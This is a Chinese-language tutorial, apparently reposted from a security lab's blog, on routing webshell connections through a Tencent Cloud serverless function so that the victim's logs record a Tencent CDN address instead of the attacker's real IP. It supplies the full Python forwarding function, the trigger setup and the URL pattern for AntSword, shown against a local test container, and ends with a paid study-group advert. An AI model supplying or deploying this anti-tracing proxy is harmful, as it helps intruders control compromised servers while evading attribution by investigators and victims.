本文主要是介绍【防溯源】利用腾讯云来隐藏连接Webshell的真实IP,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
文章来源|MS08067安全实验室
本文作者:大方子(MS08067实验室核心成员)
因为腾讯云函数自带CDN,这样我们可以通过腾讯云函数来转发我们的Webshell请求,从而达到隐藏真实IP的目的
首先来到腾讯云后台找到云函数,我们使用自定义的模版:
将下面代码复制到index.py中
# -*- coding: utf8 -*-
import requests
import json
def geturl(urlstr):jurlstr = json.dumps(urlstr)dict_url = json.loads(jurlstr)return dict_url['u']
def main_handler(event, context):url = geturl(event['queryString'])postdata = event['body']headers=event['headers']resp=requests.post(url,data=postdata,headers=headers,verify=False)response={"isBase64Encoded": False,"statusCode": 200,"headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},"body": resp.text}return response
部署成功后,点击触发管理->创建触发器
这里需要选择API网关触发
创建成功后,我们就可以看到我们的访问路径
然后在我们的访问路径后面增加?u=webshell一句话木马的地址即可,例如
https://sxxxxxxxxxxxxxxxxx.gz.apigw.tencentcs.com/release/helloworld-1627229247?u=http://xxxx/webshell.php
这里我用docker-compose来临时搭建了一个PHP服务,利用docker-coompose快速搭建PHP:
https://github.com/nanoninja/docker-nginx-php-mysql
然后在对应的文件夹下写一个webshell
然后我们在开启一个终端来实时查看PHP容器的日志信息
这里我通过蚁剑直接连接,可以看到logs显示出了我的真实IP地址
然后我们在尝试通过腾讯云的云函数来访问我们的webshell。打开蚁剑url设置为刚刚复制的云函数访问路径?u=木马路径。
https://serxxxxxxxxxxxx.gz.apigw.tencentcs.com/release/forwarded?u=http://vps-ip/index.php
然后测试连接成功
然后我们再次访问webshell,可以看到IP已经变为腾讯云CDN的IP
补充:
这里最好在【函数管理】 -> 【函数配置】里面,最好把执行超时时间设置成和蚁剑里面的超时时间一样或者更长
扫描下方二维码加入星球学习
加入后邀请你进入内部微信群,内部微信群永久有效!
来和5000+位同学一起加入星球学习吧!
这篇关于【防溯源】利用腾讯云来隐藏连接Webshell的真实IP的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!